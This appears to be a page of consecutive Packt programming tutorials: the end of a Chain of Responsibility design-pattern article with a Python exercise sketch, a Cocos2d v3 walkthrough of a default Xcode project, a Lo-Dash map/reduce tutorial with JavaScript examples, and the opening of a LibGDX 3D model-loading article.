    MainWindow Default: down
    Sending event -down- to MsgText
    MsgText: down

    Sending event -paint- to MainWindow
    MainWindow Default: paint
    Sending event -paint- to SendDialog
    SendDialog: paint
    Sending event -paint- to MsgText
    SendDialog: paint

    Sending event -unhandled- to MainWindow
    MainWindow Default: unhandled
    Sending event -unhandled- to SendDialog
    MainWindow Default: unhandled
    Sending event -unhandled- to MsgText
    MainWindow Default: unhandled

    Sending event -close- to MainWindow
    MainWindow: close
    Sending event -close- to SendDialog
    MainWindow: close
    Sending event -close- to MsgText
    MainWindow: close

There are some interesting things that we can see in the output. For instance, sending a down event to MainWindow ends up being handled by the default MainWindow handler. Another nice case is that although a close event cannot be handled directly by SendDialog and MsgText, all the close events end up being handled properly by MainWindow. That's the beauty of using the parent relationship as a fallback mechanism.

If you want to spend some more creative time on the event example, you can replace the dumb print statements and add some actual behavior to the listed events. Of course, you are not limited to the listed events. Just add your favorite event and make it do something useful! Another exercise is to add a MsgText instance during runtime that has MainWindow as the parent. Is this hard? Do the same for an event (add a new event to an existing widget). Which is harder?

Summary

In this article, we covered the Chain of Responsibility design pattern. This pattern is useful to model requests / handle events when the number and type of handlers aren't known in advance. Examples of systems that fit well with Chain of Responsibility are event-based systems, purchase systems, and shipping systems. In the Chain of Responsibility pattern, the sender has direct access to the first node of a chain. If the request cannot be satisfied by the first node, it forwards the request to the next node. This continues until either the request is satisfied by a node or the whole chain is traversed. This design is used to achieve loose coupling between the sender and the receiver(s).
ATMs are an example of Chain of Responsibility. The single slot that is used for all banknotes can be considered the head of the chain. From here, depending on the transaction, one or more receptacles are used to process the transaction. The receptacles can be considered the processing elements of the chain. Java's servlet filters use the Chain of Responsibility pattern to perform different actions (for example, compression and authentication) on an HTTP request. Apple's Cocoa frameworks use the same pattern to handle events such as button presses and finger gestures.
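For readers who want a starting point for the two exercises in the article (adding a MsgText with MainWindow as its parent at runtime, and adding a new event to an existing widget), the following is one possible sketch, not the book's solution. It repeats a trimmed copy of the article's classes so that it runs on its own, and it makes two assumptions for illustration: the handlers return strings instead of printing, and the new event is named resize. The handler is attached to the existing mw instance with types.MethodType from the standard library.

```python
import types


class Event:
    def __init__(self, name):
        self.name = name

    def __str__(self):
        return self.name


class Widget:
    def __init__(self, parent=None):
        self.parent = parent

    def handle(self, event):
        # Same dispatching logic as in the article, but returning the result
        handler = 'handle_{}'.format(event)
        if hasattr(self, handler):
            return getattr(self, handler)(event)
        elif self.parent:
            return self.parent.handle(event)
        elif hasattr(self, 'handle_default'):
            return self.handle_default(event)


class MainWindow(Widget):
    def handle_close(self, event):
        return 'MainWindow: {}'.format(event)

    def handle_default(self, event):
        return 'MainWindow Default: {}'.format(event)


class MsgText(Widget):
    def handle_down(self, event):
        return 'MsgText: {}'.format(event)


mw = MainWindow()

# Exercise 1: a MsgText created at runtime with MainWindow as its parent
late_msg = MsgText(mw)
before = late_msg.handle(Event('resize'))  # falls back to MainWindow's default


# Exercise 2: teach the existing mw instance a new event (hypothetical 'resize')
def handle_resize(self, event):
    return 'MainWindow (added at runtime): {}'.format(event)


mw.handle_resize = types.MethodType(handle_resize, mw)
after = late_msg.handle(Event('resize'))   # now reaches the new handler

print(before)
print(after)
```

Because handle() looks handlers up by name with hasattr() and getattr(), neither exercise requires changing the Widget class; the new widget and the new handler are picked up by the existing dispatching code.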


Packt

05 Feb 2015

9 min read

Run Xcode Run


In this article by Jorge Jordán, author of the book Cocos2d Game Development Blueprints, we will see how to run the newly created project in Xcode. (For more resources related to this topic, see here.)

Click on Run at the top-left of the Xcode window and it will run the project in the iOS Simulator, which defaults to an iOS 6.1 iPhone:

Voilà! You've just built your first Hello World example with Cocos2d v3, but before going further, let's take a look at the code to understand how it works. We will be using iOS Simulator to run the game unless otherwise specified.

Understanding the default project

We are going to take an overview of the classes available in a new project, but don't worry if you don't understand everything; the objective of this section is just to get familiar with the look of a Cocos2d game. If you open the main.m file under the Supporting Files group, you will see:

    int main(int argc, char *argv[]) {
        @autoreleasepool {
            int retVal = UIApplicationMain(argc, argv, nil, @"AppDelegate");
            return retVal;
        }
    }

As you can see, the @autoreleasepool block means that ARC is enabled by default on new Cocos2d projects, so we don't have to worry about releasing objects or enabling ARC. ARC is the acronym for Automatic Reference Counting, a compiler feature that provides automatic memory management of objects. It works by adding code at compile time, ensuring every object lives as long as necessary, but not longer. On the other hand, the block calls AppDelegate, a class that inherits from CCAppDelegate, which implements the UIApplicationDelegate protocol. In other words, the starting point of our game and the place to set up our app is located in AppDelegate, like a typical iOS application.
If you open AppDelegate.m, you will see the following method, which is called when the game has been launched:

    -(BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions
    {
        [self setupCocos2dWithOptions:@{
            CCSetupShowDebugStats: @(YES),
        }];
        return YES;
    }

Here, the only initial configuration specified is to enable the debug stats, using the option CCSetupShowDebugStats: @(YES) that you can see in the previous block of code. The number on the top indicates the number of draw calls, and the two labels below are the time needed to update the frame and the frame rate, respectively. The maximum frame rate an iOS device can have is 60, and it's a measure of the smoothness a game can attain: the higher the frame rate, the smoother the game. You will need to keep the top and the bottom values in mind, as the number of draw calls and the frame rate will let you know how efficient your game will be. The next thing to take care of is the startScene method:

    -(CCScene *)startScene
    {
        // The initial scene will be IntroScene
        return [IntroScene scene];
    }

This method should be overridden to indicate the first scene we want to display in our game.
In this case, it points to IntroScene, where the init method looks like the following code:

    - (id)init
    {
        // Apple recommends assigning self with super's return value
        self = [super init];
        if (!self) {
            return(nil);
        }

        // Create a colored background (Dark Gray)
        CCNodeColor *background = [CCNodeColor nodeWithColor:[CCColor colorWithRed:0.2f green:0.2f blue:0.2f alpha:1.0f]];
        [self addChild:background];

        // Hello world
        CCLabelTTF *label = [CCLabelTTF labelWithString:@"Hello World" fontName:@"Chalkduster" fontSize:36.0f];
        label.positionType = CCPositionTypeNormalized;
        label.color = [CCColor redColor];
        label.position = ccp(0.5f, 0.5f); // Middle of screen
        [self addChild:label];

        // Helloworld scene button
        CCButton *helloWorldButton = [CCButton buttonWithTitle:@"[Start ]" fontName:@"Verdana-Bold" fontSize:18.0f];
        helloWorldButton.positionType = CCPositionTypeNormalized;
        helloWorldButton.position = ccp(0.5f, 0.35f);
        [helloWorldButton setTarget:self selector:@selector(onSpinningClicked:)];
        [self addChild:helloWorldButton];

        // done
        return self;
    }

This code first calls the initialization method of IntroScene's superclass by sending the [super init] message. Then it creates a gray-colored background with a CCNodeColor class, which is basically a solid color node, but this background won't be shown until it's added to the scene, which is exactly what [self addChild:background] does. The red "Hello World" label you can see in the previous screenshot is an instance of the CCLabelTTF class, whose position will be centered on the screen thanks to label.position = ccp(0.5f, 0.5f). Cocos2d provides ccp(coord_x, coord_y), which is a preprocessor macro for CGPointMake; both can be used interchangeably. The last code block creates a CCButton that will call onSpinningClicked once we click on it. This source code isn't hard at all, but what will happen when we click on the Start button? Don't be shy, go back to the iOS Simulator and find out!
If you take a look at the onSpinningClicked method in IntroScene.m, you will understand what happened:

    - (void)onSpinningClicked:(id)sender
    {
        // start spinning scene with transition
        [[CCDirector sharedDirector] replaceScene:[HelloWorldScene scene]
                                   withTransition:[CCTransition transitionPushWithDirection:CCTransitionDirectionLeft duration:1.0f]];
    }

This code presents the HelloWorldScene scene in place of the current one (IntroScene): replaceScene swaps the running scene for HelloWorldScene, animated with a horizontal push transition that lasts 1.0 second. Let's take a look at HelloWorldScene.m to understand the behavior we just experienced:

    @implementation HelloWorldScene
    {
        CCSprite *_sprite;
    }

    - (id)init
    {
        // Apple recommends assigning self with super's return value
        self = [super init];
        if (!self) {
            return(nil);
        }

        // Enable touch handling on scene node
        self.userInteractionEnabled = YES;

        // Create a colored background (Dark Gray)
        CCNodeColor *background = [CCNodeColor nodeWithColor:[CCColor colorWithRed:0.2f green:0.2f blue:0.2f alpha:1.0f]];
        [self addChild:background];

        // Add a sprite
        _sprite = [CCSprite spriteWithImageNamed:@"Icon-72.png"];
        _sprite.position = ccp(self.contentSize.width/2, self.contentSize.height/2);
        [self addChild:_sprite];

        // Animate sprite with action
        CCActionRotateBy* actionSpin = [CCActionRotateBy actionWithDuration:1.5f angle:360];
        [_sprite runAction:[CCActionRepeatForever actionWithAction:actionSpin]];

        // Create a back button
        CCButton *backButton = [CCButton buttonWithTitle:@"[ Menu ]" fontName:@"Verdana-Bold" fontSize:18.0f];
        backButton.positionType = CCPositionTypeNormalized;
        backButton.position = ccp(0.85f, 0.95f); // Top Right of screen
        [backButton setTarget:self selector:@selector(onBackClicked:)];
        [self addChild:backButton];

        // done
        return self;
    }

This piece of code is very similar to the one we saw in IntroScene.m, which is why we just need to focus on the differences.
If you look at the top of the class, you can see how we declare a private instance variable of the CCSprite class, which is also a subclass of CCNode and whose main role is to render 2D images on the screen. The CCSprite class is one of the most-used classes in Cocos2d game development, as it provides a visual representation and a physical shape to the objects in view. Then, in the init method, you will see the instruction self.userInteractionEnabled = YES, which is used to enable the current scene to detect and manage touches by implementing the touchBegan method. The next thing to highlight is how we initialize a CCSprite class using an image, positioning it in the center of the screen. If you read a couple more lines, you will understand why the icon rotates as soon as the scene is loaded. We create a 360-degree rotation action thanks to CCActionRotateBy that will last for 1.5 seconds. But why is this rotation repeated over and over? This happens thanks to CCActionRepeatForever, which will execute the rotate action as long as the scene is running. The last piece of code in the init method doesn't need explanation, as it creates a CCButton that will execute onBackClicked once clicked. This method replaces the scene HelloWorldScene with IntroScene in a similar way as we saw before, with only one difference: the transition happens from left to right. Did you try to touch the screen? Try it and you will understand why touchBegan has the following code:

    -(void) touchBegan:(UITouch *)touch withEvent:(UIEvent *)event
    {
        CGPoint touchLoc = [touch locationInNode:self];

        // Move our sprite to touch location
        CCActionMoveTo *actionMove = [CCActionMoveTo actionWithDuration:1.0f position:touchLoc];
        [_sprite runAction:actionMove];
    }

This is one of the methods you need to implement to manage touch. The others are touchMoved, touchEnded, and touchCancelled.
When the user begins touching the screen, the sprite will move to the registered coordinates thanks to a commonly used action: CCActionMoveTo. This action just needs to know the position that we want to move our sprite to and the duration of the movement. Now that we have had an overview of the initial project code, it is time to go deeper into some of the classes we have shown. Did you realize that CCNode is the parent class of several classes we have seen? You will understand why if you keep reading.

Summary

In this article, we had our first contact with a Cocos2d project. We executed a new project and took an overview of it, understanding some of the classes that are part of this framework.


Packt

05 Feb 2015

19 min read

Transformations Using Map/Reduce


In this article written by Adam Boduch, author of the book Lo-Dash Essentials, we'll be looking at all the interesting things we can do with Lo-Dash and the map/reduce programming model. We'll start off with the basics, getting our feet wet with some basic mappings and basic reductions. As we progress through the article, we'll start introducing more advanced techniques to think in terms of map/reduce with Lo-Dash. The goal, once you've reached the end of this article, is to have a solid understanding of the Lo-Dash functions available that aid in mapping and reducing collections. Additionally, you'll start to notice how disparate Lo-Dash functions work together in the map/reduce domain. Ready? (For more resources related to this topic, see here.) Plucking values Consider that as your informal introduction to mapping because that's essentially what it's doing. It's taking an input collection and mapping it to a new collection, plucking only the properties we're interested in. This is shown in the following example: var collection = [ { name: 'Virginia', age: 45 }, { name: 'Debra', age: 34 }, { name: 'Jerry', age: 55 }, { name: 'Earl', age: 29 } ]; _.pluck(collection, 'age'); // → [ 45, 34, 55, 29 ] This is about as simple a mapping operation as you'll find. In fact, you can do the same thing with map(): var collection = [ { name: 'Michele', age: 58 }, { name: 'Lynda', age: 23 }, { name: 'William', age: 35 }, { name: 'Thomas', age: 41 } ]; _.map(collection, 'name'); // → // [ // "Michele", // "Lynda", // "William", // "Thomas" // ] As you'd expect, the output here is exactly the same as it would be with pluck(). In fact, pluck() is actually using the map() function under the hood. The callback passed to map() is constructed using property(), which just returns the specified property value. The map() function falls back to this plucking behavior when a string instead of a function is passed to it. 
With that brief introduction to the nature of mapping, let's dig a little deeper and see what's possible in mapping collections.

Mapping collections

In this section, we'll explore mapping collections. Mapping one collection to another ranges from really simple callbacks, as we saw in the preceding section, to sophisticated ones. These callbacks that map each item in the collection can include or exclude properties and can calculate new values. Besides, we can apply functions to these items. We'll also address the issue of filtering collections and how this can be done in conjunction with mapping.

Including and excluding properties

When applied to an object, the pick() function generates a new object containing only the specified properties. The opposite of this function, omit(), generates an object with every property except those specified. Since these functions work fine for individual object instances, why not use them in a collection? You can use both of these functions to shed properties from collections by mapping them to new ones, as shown in the following code:

    var collection = [
        { first: 'Ryan', last: 'Coleman', age: 23 },
        { first: 'Ann', last: 'Sutton', age: 31 },
        { first: 'Van', last: 'Holloway', age: 44 },
        { first: 'Francis', last: 'Higgins', age: 38 }
    ];

    _.map(collection, function(item) {
        return _.pick(item, [ 'first', 'last' ]);
    });
    // →
    // [
    //   { first: "Ryan", last: "Coleman" },
    //   { first: "Ann", last: "Sutton" },
    //   { first: "Van", last: "Holloway" },
    //   { first: "Francis", last: "Higgins" }
    // ]

Here, we're creating a new collection using the map() function. The callback function supplied to map() is applied to each item in the collection. The item argument is the original item from the collection. The callback is expected to return the mapped version of that item, and this version could be anything, including the original item itself. Be careful when manipulating the original item in map() callbacks.
If the item is an object and it's referenced elsewhere in your application, it could have unintended consequences. We're returning a new object as the mapped item in the preceding code. This is done using the pick() function. We only care about the first and the last properties. Our newly mapped collection looks identical to the original, except that no item has an age property. This newly mapped collection is seen in the following code: var collection = [ { first: 'Clinton', last: 'Park', age: 19 }, { first: 'Dana', last: 'Hines', age: 36 }, { first: 'Pete', last: 'Ross', age: 31 }, { first: 'Annie', last: 'Cross', age: 48 } ]; _.map(collection, function(item) { return _.omit(item, 'first'); }); // → // [ // { last: "Park", age: 19 }, // { last: "Hines", age: 36 }, // { last: "Ross", age: 31 }, // { last: "Cross", age: 48 } // ] The preceding code follows the same approach as the pick() code. The only difference is that we're excluding the first property from the newly created collection. You'll also notice that we're passing a string containing a single property name instead of an array of property names. In addition to passing strings or arrays as the argument to pick() or omit(), we can pass in a function callback. This is suitable when it's not very clear which objects in a collection should have which properties. 
Using a callback like this inside a map() callback lets us perform detailed comparisons and transformations on collections while using very little code:

    function invalidAge(value, key) {
        return key === 'age' && value < 40;
    }

    var collection = [
        { first: 'Kim', last: 'Lawson', age: 40 },
        { first: 'Marcia', last: 'Butler', age: 31 },
        { first: 'Shawna', last: 'Hamilton', age: 39 },
        { first: 'Leon', last: 'Johnston', age: 67 }
    ];

    _.map(collection, function(item) {
        return _.omit(item, invalidAge);
    });
    // →
    // [
    //   { first: "Kim", last: "Lawson", age: 40 },
    //   { first: "Marcia", last: "Butler" },
    //   { first: "Shawna", last: "Hamilton" },
    //   { first: "Leon", last: "Johnston", age: 67 }
    // ]

The new collection generated by this code excludes the age property for items where the age value is less than 40. The callback supplied to omit() is applied to each key-value pair in the object. This code is a good illustration of the conciseness achievable with Lo-Dash. There's a lot of iterative code running here and there is no for or while statement in sight.

Performing calculations

It's time now to turn our attention to performing calculations in our map() callbacks. This entails looking at the item and, based on its current state, computing a new value that will ultimately be mapped to the new collection. This could mean extending the original item's properties or replacing one with a newly computed value. Whichever the case, it's a lot easier to map these computations than to write your own logic that applies these functions to every item in your collection. This is explained using the following example:

    var collection = [
        { name: 'Valerie', jqueryYears: 4, cssYears: 3 },
        { name: 'Alonzo', jqueryYears: 1, cssYears: 5 },
        { name: 'Claire', jqueryYears: 3, cssYears: 1 },
        { name: 'Duane', jqueryYears: 2, cssYears: 0 }
    ];

    _.map(collection, function(item) {
        return _.extend({
            experience: item.jqueryYears + item.cssYears,
            specialty: item.jqueryYears >= item.cssYears ?
                'jQuery' : 'CSS'
        }, item);
    });
    // →
    // [
    //   {
    //     experience: 7,
    //     specialty: "jQuery",
    //     name: "Valerie",
    //     jqueryYears: 4,
    //     cssYears: 3
    //   },
    //   {
    //     experience: 6,
    //     specialty: "CSS",
    //     name: "Alonzo",
    //     jqueryYears: 1,
    //     cssYears: 5
    //   },
    //   {
    //     experience: 4,
    //     specialty: "jQuery",
    //     name: "Claire",
    //     jqueryYears: 3,
    //     cssYears: 1
    //   },
    //   {
    //     experience: 2,
    //     specialty: "jQuery",
    //     name: "Duane",
    //     jqueryYears: 2,
    //     cssYears: 0
    //   }
    // ]

Here, we're mapping each item in the original collection to an extended version of it. In particular, we're computing two new values for each item: experience and specialty. The experience property is simply the sum of the jqueryYears and cssYears properties. The specialty property is computed based on the larger value of the jqueryYears and cssYears properties.

Earlier, I mentioned the need to be careful when modifying items in map() callbacks. In general, it's a bad idea. It's helpful to try and remember that map() is used to generate new collections, not to modify existing collections. Here's an illustration of the horrific consequences of not being careful:

    var app = {},
        collection = [
            { name: 'Cameron', supervisor: false },
            { name: 'Lindsey', supervisor: true },
            { name: 'Kenneth', supervisor: false },
            { name: 'Caroline', supervisor: true }
        ];

    app.supervisor = _.find(collection, { supervisor: true });

    _.map(collection, function(item) {
        return _.extend(item, { supervisor: false });
    });

    console.log(app.supervisor);
    // → { name: "Lindsey", supervisor: false }

The destructive nature of this callback is not obvious at all, and it is next to impossible for programmers to track down and diagnose. The callback is essentially resetting the supervisor attribute for each item. If these items are used anywhere else in the application, the supervisor property value will be clobbered whenever this map job is executed.
If you need to reset values like this, ensure that the change is mapped to the new value and not made to the original. Mapping also works with primitive values as the item. Often, we'll have an array of primitive values that we'd like transformed into an alternative representation. For example, let's say you have an array of sizes, expressed in bytes. You can map those arrays to a new collection with those sizes expressed as human-readable values, using the following code: function bytes(b) { var units = [ 'B', 'K', 'M', 'G', 'T', 'P' ], target = 0; while (b >= 1024) { b = b / 1024; target++; } return (b % 1 === 0 ? b : b.toFixed(1)) + units[target] + (target === 0 ? '' : 'B'); } var collection = [ 1024, 1048576, 345198, 120120120 ]; _.map(collection, bytes); // → [ "1KB", "1MB", "337.1KB", "114.6MB" ] The bytes() function takes a numerical argument, which is the number of bytes to be formatted. This is the starting unit. We just keep incrementing the target unit until we have something that is less than 1024. For example, the last item in our collection maps to '114.6MB'. The bytes() function can be passed directly to map() since it's expecting values in our collection as they are. Calling functions We don't always have to write our own callback functions for map(). Wherever it makes sense, we're free to leverage Lo-Dash functions to map our collection items. For example, let's say we have a collection and we'd like to know the size of each item. There's a size() Lo-Dash function we can use as our map() callback, as follows: var collection = [ [ 1, 2 ], [ 1, 2, 3 ], { first: 1, second: 2 }, { first: 1, second: 2, third: 3 } ]; _.map(collection, _.size); // → [ 2, 3, 2, 3 ] This code has the added benefit that the size() function returns consistent results, no matter what kind of argument is passed to it. In fact, any function that takes a single argument and returns a new value based on that argument is a valid candidate for a map() callback. 
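One caveat is worth checking before passing an existing function straight to map(): the callback receives more than just the value. The built-in Array.prototype.map() passes the value, its index, and the array, and the Lo-Dash callbacks shown in this article likewise receive a key as their second argument, so a function with optional extra parameters can misbehave. Here is a short plain-JavaScript sketch of the issue, with illustrative variable names:

```javascript
var sizes = [ '10', '10', '10' ];

// parseInt(string, radix) treats the index passed by map() as the radix.
var surprising = sizes.map(parseInt);
console.log(surprising); // → [ 10, NaN, 2 ]

// Number() only looks at its first argument, so it can be passed directly.
var direct = sizes.map(Number);
console.log(direct); // → [ 10, 10, 10 ]

// Wrapping the call makes the single-argument intent explicit.
var wrapped = sizes.map(function(item) {
  return parseInt(item, 10);
});
console.log(wrapped); // → [ 10, 10, 10 ]
```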
For instance, we could also map the minimum and maximum value of each item: var source = _.range(1000), collection = [ _.sample(source, 50), _.sample(source, 100), _.sample(source, 150) ]; _.map(collection, _.min); // → [ 20, 21, 1 ] _.map(collection, _.max); // → [ 931, 985, 991 ] What if we want to map each item of our collection to a sorted version? Since we do not sort the collection itself, we don't care about the item positions within the collection, but the items themselves, if they're arrays, for instance. Let's see what happens with the following code: var collection = [ [ 'Evan', 'Veronica', 'Dana' ], [ 'Lila', 'Ronald', 'Dwayne' ], [ 'Ivan', 'Alfred', 'Doug' ], [ 'Penny', 'Lynne', 'Andy' ] ]; _.map(collection, _.compose(_.first, function(item) { return _.sortBy(item); })); // → [ "Dana", "Dwayne", "Alfred", "Andy" ] This code uses the compose() function to construct a map() callback. The first function returns the sorted version of the item by passing it to sortBy(). The first() item of this sorted list is then returned as the mapped item. The end result is a new collection containing the alphabetically first item from each array in our collection, with three lines of code. This is not bad. Filtering and mapping Filtering and mapping are two closely related collection operations. Filtering extracts only those collection items that are of particular interest in a given context. Mapping transforms collections to produce new collections. But what if you only want to map a certain subset of your collection? Then it would make sense to chain together the filtering and mapping operations, right? 
Here's an example of what that might look like: var collection = [ { name: 'Karl', enabled: true }, { name: 'Sophie', enabled: true }, { name: 'Jerald', enabled: false }, { name: 'Angie', enabled: false } ]; _.compose( _.partialRight(_.map, 'name'), _.partialRight(_.filter, 'enabled') )(collection); // → [ "Karl", "Sophie" ] This map is executed using compose() to build a function that is called right away, with our collection as the argument. The function is composed of two partials. We're using partialRight() on both arguments because we want the collection supplied as the leftmost argument in both cases. The first partial function is filter(). We're partially applying the enabled argument. So this function will filter our collection before it's passed to map(). This brings us to our next partial in the function composition. The result of filtering the collection is passed to map(), which has the name argument partially applied. The end result is a collection with enabled name strings. The important thing to note about the preceding code is that the filtering operation takes place before the map() function is run. We could have stored the filtered collection in an intermediate variable instead of streamlining with compose(). Regardless of flavor, it's important that the items in your mapped collection correspond to the items in the source collection. It's conceivable to filter out the items in the map() callback by not returning anything, but this is ill-advised as it doesn't map well, both figuratively and literally. Mapping objects The previous section focused on collections and how to map them. But wait, objects are collections too, right? That is indeed correct, but it's worth differentiating between the more traditional collections, arrays, and plain objects. The main reason is that there are implications with ordering and keys when performing map/reduce. 
At the end of the day, arrays and objects serve different use cases with map/reduce, and this article tries to acknowledge these differences. Now we'll start looking at some techniques Lo-Dash programmers employ when working with objects and mapping them to collections. There are a number of factors to consider such as the keys within an object and calling methods on objects. We'll take a look at the relationship between key-value pairs and how they can be used in a mapping context. Working with keys We can use the keys of a given object in interesting ways to map the object to a new collection. For example, we can use the keys() function to extract the keys of an object and map them to values other than the property value, as shown in the following example: var object = { first: 'Ronald', last: 'Walters', employer: 'Packt' }; _.map(_.sortBy(_.keys(object)), function(item) { return object[item]; }); // → [ "Packt", "Ronald", "Walters" ] The preceding code builds an array of property values from object. It does so using map(), which is actually mapping the keys() array of object. These keys are sorted using sortBy(). So Packt is the first element of the resulting array because employer is alphabetically first in the object keys. Sometimes, it's desirable to perform lookups in other objects and map those values to a target object. For example, not all APIs return everything you need for a given page, packaged in a neat little object. You have to do joins and build the data you need. This is shown in the following code: var users = {}, preferences = {}; _.each(_.range(100), function() { var id = _.uniqueId('user-'); users[id] = { type: 'user' }; preferences[id] = { emailme: !!(_.random()) }; }); _.map(users, function(value, key) { return _.extend({ id: key }, preferences[key]); }); // → // [ // { id: "user-1", emailme: true }, // { id: "user-2", emailme: false }, // ... // ] This example builds two objects, users and preferences. 
For both objects, the keys are user identifiers that we're generating with uniqueId(). The user objects just have some dummy attribute in them, while the preferences objects have an emailme attribute, set to a random Boolean value. Now let's say we need quick access to this preference for all users in the users object. As you can see, it's straightforward to implement using map() on the users object. The callback function returns a new object with the user ID. We extend this object with the preference for that particular user by looking it up by key. Calling methods Objects aren't limited to storing primitive strings and numbers. Properties can store functions as their values, or methods, as they're commonly called. However, depending on the context where you're using your object, methods aren't always callable, especially if you have little or no control over the context where your objects are used. One technique that's helpful in situations such as these is mapping the result of calling these methods and using this result in the context in question. Let's see how this can be done with the following code: var object = { first: 'Roxanne', last: 'Elliot', name: function() { return this.first + ' ' + this.last; }, age: 38, retirement: 65, working: function() { return this.retirement - this.age; } }; _.map(object, function(value, key) { var item = {}; item[key] = _.isFunction(value) ? object[key]() : value; return item; }); // → // [ // { first: "Roxanne" }, // { last: "Elliot" }, // { name: "Roxanne Elliot" }, // { age: 38 }, // { retirement: 65 }, // { working: 27 } // ] _.map(object, function(value, key) { var item = {}; item[key] = _.result(object, key); return item; }); // → // [ // { first: "Roxanne" }, // { last: "Elliot" }, // { name: "Roxanne Elliot" }, // { age: 38 }, // { retirement: 65 }, // { working: 27 } // ] Here, we have an object with both primitive property values and methods that use these properties.
Now we'd like to map the results of calling those methods and we will experiment with two different approaches. The first approach uses the isFunction() function to determine whether the property value is callable or not. If it is, we call it and return that value. The second approach is a little easier to implement and achieves the same outcome. The result() function is applied to the object using the current key. This tests whether we're working with a function or not, so our code doesn't have to. In the first approach to mapping method invocations, you might have noticed that we're calling the method using object[key]() instead of value(). The former retains the context as the object variable, but the latter loses the context, since it is invoked as a plain function without any object. So when you're writing mapping callbacks that call methods and not getting the expected results, make sure the method's context is intact. Perhaps, you have an object but you're not sure which properties are methods. You can use functions() to figure this out and then map the results of calling each method to an array, as shown in the following code: var object = { firstName: 'Fredrick', lastName: 'Townsend', first: function() { return this.firstName; }, last: function() { return this.lastName; } }; var methods = _.map(_.functions(object), function(item) { return [ _.bindKey(object, item) ]; }); _.invoke(methods, 0); // → [ "Fredrick", "Townsend" ] The object variable has two methods, first() and last(). Assuming we didn't know about these methods, we can find them using functions(). Here, we're building a methods array using map(). The input is an array containing the names of all the methods of the given object. The value we're returning is interesting. It's a single-value array; you'll see why in a moment. The value of this array is a function built by passing the object and the name of the method to bindKey(). This function, when invoked, will always use object as its context. 
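The context issue described above can be reproduced without Lo-Dash. The sketch below uses the built-in Function.prototype.bind() as a stand-in for bindKey(). The two are not identical, since bind() captures the function itself whereas bindKey() is documented to look the method up by key when the bound function is called. The names person, detached, bound, and safeCall are illustrative.

```javascript
var person = {
  first: 'Roxanne',
  last: 'Elliot',
  name: function() {
    return this.first + ' ' + this.last;
  }
};

// Pulling the method off the object loses its context.
var detached = person.name;

// bind() fixes the context, however the function is called later.
var bound = person.name.bind(person);

// Helper: a detached call may throw (strict mode) or read from the wrong object.
function safeCall(fn) {
  try {
    return fn();
  } catch (e) {
    return 'error: ' + e.name;
  }
}

console.log(safeCall(detached));      // anything but "Roxanne Elliot"
console.log(safeCall(bound));         // → "Roxanne Elliot"
console.log([ bound ].map(safeCall)); // → [ "Roxanne Elliot" ]
```

Because the bound function carries its own context, it can be handed to any callback-driven helper without the caller needing to know which object it belongs to.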
Lastly, we use invoke() to invoke each method in our methods array, building a new result array. Recall that our map() callback returned an array. This was a simple hack to make invoke() work, since it's a convenient way to call methods. It generally expects a key as the second argument, but a numerical index works just as well, since both are looked up the same way. Mapping key-value pairs Just because you're working with an object doesn't mean it's ideal, or even necessary. That's what map() is for: mapping what you're given to what you need. For instance, the property values are sometimes all that matter for what you're doing, and you can dispense with the keys entirely. For that, we have the values() function and we feed the values to map(): var object = { first: 'Lindsay', last: 'Castillo', age: 51 }; _.map(_.filter(_.values(object), _.isString), function(item) { return '<strong>' + item + '</strong>'; }); // → [ "<strong>Lindsay</strong>", "<strong>Castillo</strong>" ] All we want from the object variable here is a list of the property values that are strings, so that we can format them. In other words, the fact that the keys are first, last, and age is irrelevant. So first, we call values() to build an array of values. Next, we pass that array to filter(), removing anything that's not a string. We then pass the output of this to map(), where we wrap each string in <strong> tags. The opposite might also be true: the value is completely meaningless without its key.
If that's the case, it may be fitting to map key-value pairs to a new collection, as shown in the following example: function capitalize(s) { return s.charAt(0).toUpperCase() + s.slice(1); } function format(label, value) { return '<label>' + capitalize(label) + ':</label>' + '<strong>' + value + '</strong>'; } var object = { first: 'Julian', last: 'Ramos', age: 43 }; _.map(_.pairs(object), function(pair) { return format.apply(undefined, pair); }); // → // [ // "<label>First:</label><strong>Julian</strong>", // "<label>Last:</label><strong>Ramos</strong>", // "<label>Age:</label><strong>43</strong>" // ] We're passing the result of running our object through the pairs() function to map(). The argument passed to our map callback function is an array, the first element being the key and the second being the value. It so happens that the format() function expects a key and a value to format the given string, so we're able to use format.apply() to call the function, passing it the pair array. This approach is just a matter of taste. There's no need to call pairs() before map(). We could just as easily have called format directly. But sometimes, this approach is preferred, and the reasons, not least of which is the style of the programmer, are wide and varied. Summary This article introduced you to the map/reduce programming model and how Lo-Dash tools help realize it in your application. First, we examined mapping collections, including how to choose which properties get included and how to perform calculations. We then moved on to mapping objects. Keys can have an important role in how objects get mapped to new objects and collections. There are also methods and functions to consider when mapping. Resources for Article: Further resources on this subject: The First Step [article] Recursive directives [article] AngularJS Project [article]

How-To Tutorials

Packt

05 Feb 2015

7 min read

3D Modeling

In this article by Suryakumar Balakrishnan Nair and Andreas Oehlke, authors of Learning LibGDX Game Development, Second Edition, you will learn how to load a model and create a basic 3D scene. In a game, we need an actual model exported from Blender or any other 3D animation software. (For more resources related to this topic, see here.) Loading a model Copy these three files to the assets folder of the android project: car.g3dj: This is the model file to be used in our example tiretext.jpg and yellowtaxi.jpg: These are the materials for the model Replacing the ModelBuilder class in our ModelTest.java file, we add the following code: assets = new AssetManager(); assets.load("car.g3dj", Model.class); assets.finishLoading(); model = assets.get("car.g3dj", Model.class); instance = new ModelInstance(model); Additionally, a camera input controller is also added to inspect the model from various angles as follows: camController = new CameraInputController(cam); Gdx.input.setInputProcessor(camController); camController.update(); This camera input controller will be updated on each render() by calling camController.update(). 
